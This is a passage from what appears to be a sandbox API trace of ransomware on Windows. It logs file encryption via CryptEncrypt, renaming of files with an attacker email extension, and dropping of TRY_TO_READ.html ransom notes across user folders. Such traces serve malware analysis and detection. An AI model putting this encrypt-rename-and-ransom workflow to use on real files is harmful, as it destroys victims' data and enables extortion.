pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.255] GetProcessHeap () returned 0x2e0000 [0161.255] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.255] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.255] WriteFile (in: hFile=0x4d0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.256] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.256] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.256] ReadFile (in: hFile=0x4d0, lpBuffer=0x3af410, nNumberOfBytesToRead=0x265d, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x3af410*, lpNumberOfBytesRead=0x2acf9c8*=0x265d, lpOverlapped=0x0) returned 1 [0161.258] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x20, pbBuffer=0x363a50 | out: pbBuffer=0x363a50) returned 1 [0161.258] CryptGenRandom (in: hProv=0x3289b8, dwLen=0x8, pbBuffer=0x383db0 | out: pbBuffer=0x383db0) returned 1 [0161.258] SetFileAttributesW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", dwFileAttributes=0x80) returned 1 [0161.258] lstrlenW (lpString="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned 49 [0161.258] GetProcessHeap () returned 0x2e0000 [0161.258] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0xc8) returned 0x319d30 [0161.258] lstrcpyW (in: lpString1=0x319d30, lpString2="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" [0161.258] lstrcatW (in: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini", lpString2=".12781717671972518758.ex_parvis@aol.com.AIR" | out: lpString1="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR") returned="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" [0161.258] MoveFileExW (lpExistingFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini"), lpNewFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwFlags=0x8) returned 1 [0161.260] CreateFileW (lpFileName="C:\\\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.AIR" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\desktop.ini.12781717671972518758.ex_parvis@aol.com.air"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d0 [0161.260] GetProcessHeap () returned 0x2e0000 [0161.260] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x319d30 | out: hHeap=0x2e0000) returned 1 [0161.260] GetFileSizeEx (in: hFile=0x4d0, lpFileSize=0x2acf98c | out: lpFileSize=0x2acf98c*=504) returned 1 [0161.260] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x2acf9a8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2acf9a8*=0) returned 0x1f8 [0161.260] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2acf9c4*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x2acf9c4*=0x100) returned 1 [0161.260] GetProcessHeap () returned 0x2e0000 [0161.260] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x100) returned 0x363b58 [0161.260] CryptEncrypt (in: hKey=0x317a48, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x20, dwBufLen=0x100 | out: pbData=0x363b58*, pdwDataLen=0x2acf9b4*=0x100) returned 1 [0161.261] WriteFile (in: hFile=0x4d0, lpBuffer=0x363b58*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x363b58*, lpNumberOfBytesWritten=0x2acf9c8*=0x100, lpOverlapped=0x0) returned 1 [0161.262] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x8, lpOverlapped=0x0) returned 1 [0161.262] WriteFile (in: hFile=0x4d0, lpBuffer=0x383db0*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x383db0*, lpNumberOfBytesWritten=0x2acf9c8*=0x4, lpOverlapped=0x0) returned 1 [0161.262] ReadFile (in: hFile=0x4d0, lpBuffer=0x32f868, nNumberOfBytesToRead=0x1f8, lpNumberOfBytesRead=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x32f868*, lpNumberOfBytesRead=0x2acf9c8*=0x1f8, lpOverlapped=0x0) returned 1 [0161.262] SetFilePointer (in: hFile=0x4d0, lDistanceToMove=-504, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0161.262] WriteFile (in: hFile=0x4d0, lpBuffer=0x31d01e0*, nNumberOfBytesToWrite=0x1f8, lpNumberOfBytesWritten=0x2acf9c8, lpOverlapped=0x0 | out: lpBuffer=0x31d01e0*, lpNumberOfBytesWritten=0x2acf9c8*=0x1f8, lpOverlapped=0x0) returned 1 [0161.263] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Adobe\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e558 [0161.263] FindNextFileW (in: hFindFile=0x35e558, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.263] FindNextFileW (in: hFindFile=0x35e558, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8000ce40, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x8000ce40, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0x8000ce40, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0161.263] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\Acrobat\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\acrobat\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4 [0161.265] FindNextFileW (in: hFindFile=0x35e558, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe4efbbe0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe4efbbe0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe4efbbe0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ARM", cAlternateFileName="")) returned 1 [0161.265] CreateFileW (lpFileName="C:\\\\Users\\All Users\\Adobe\\ARM\\TRY_TO_READ.html" (normalized: "c:\\users\\all users\\adobe\\arm\\try_to_read.html"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4d4 [0161.267] FindNextFileW (in: hFindFile=0x35e558, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 1 [0161.267] FindNextFileW (in: hFindFile=0x35e558, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0 [0161.267] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Application Data\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.267] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Desktop\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.267] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Documents\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.267] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Favorites\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x978cec50, ftCreationTime.dwHighDateTime=0x1d5956e, ftLastAccessTime.dwLowDateTime=0x978cec50, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978cec50, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x14bb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="TRY_TO_READ.html", cAlternateFileName="TRY_TO~1.HTM")) returned 0xffffffff [0161.268] FindFirstFileW (in: lpFileName="C:\\\\Users\\All Users\\Microsoft Help\\*", lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x35e598 [0161.268] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x978f4db0, ftLastAccessTime.dwHighDateTime=0x1d5956e, ftLastWriteTime.dwLowDateTime=0x978f4db0, ftLastWriteTime.dwHighDateTime=0x1d5956e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.hxn", cAlternateFileName="")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa72fc10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa72fc10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.14.1033.hxn", cAlternateFileName="MSEXCE~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfa755d70, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfa755d70, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfa7a2030, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.EXCEL.DEV.14.1033.hxn", cAlternateFileName="MSEXCE~2.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GRAPH.14.1033.hxn", cAlternateFileName="MSGRAP~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xfd789af0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfd789af0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfd822070, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.GROOVE.14.1033.hxn", cAlternateFileName="MSGROO~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x11446a50, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATH.14.1033.hxn", cAlternateFileName="MSINFO~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x113ae4d0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x113ae4d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1146cbb0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.INFOPATHEDITOR.14.1033.hxn", cAlternateFileName="MSINFO~2.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.14.1033.hxn", cAlternateFileName="MSMSAC~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x15f8e210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x15f8e210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1604c8f0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSACCESS.DEV.14.1033.hxn", cAlternateFileName="MSMSAC~2.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSOUC.14.1033.hxn", cAlternateFileName="MSMSOU~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.14.1033.hxn", cAlternateFileName="MSMSPU~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x1beeb370, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x1beeb370, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x1bf5d790, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSPUB.DEV.14.1033.hxn", cAlternateFileName="MSMSPU~2.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x14c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.MSTORE.14.1033.hxn", cAlternateFileName="MSMSTO~1.HXN")) returned 1 [0161.269] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x13a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OIS.14.1033.hxn", cAlternateFileName="MSOIS1~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xc997810, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc997810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc9e3ad0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.ONENOTE.14.1033.hxn", cAlternateFileName="MSONEN~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x2689510, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.14.1033.hxn", cAlternateFileName="MSOUTL~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x25328b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x25328b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x26af670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.DEV.14.1033.hxn", cAlternateFileName="MSOUTL~2.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.14.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.DEV.14.1033.hxn", cAlternateFileName="MSPOWE~2.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.SETLANG.14.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1 [0161.270] FindNextFileW (in: hFindFile=0x35e598, lpFindFileData=0x2acfb30 | out: lpFindFileData=0x2acfb30*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, 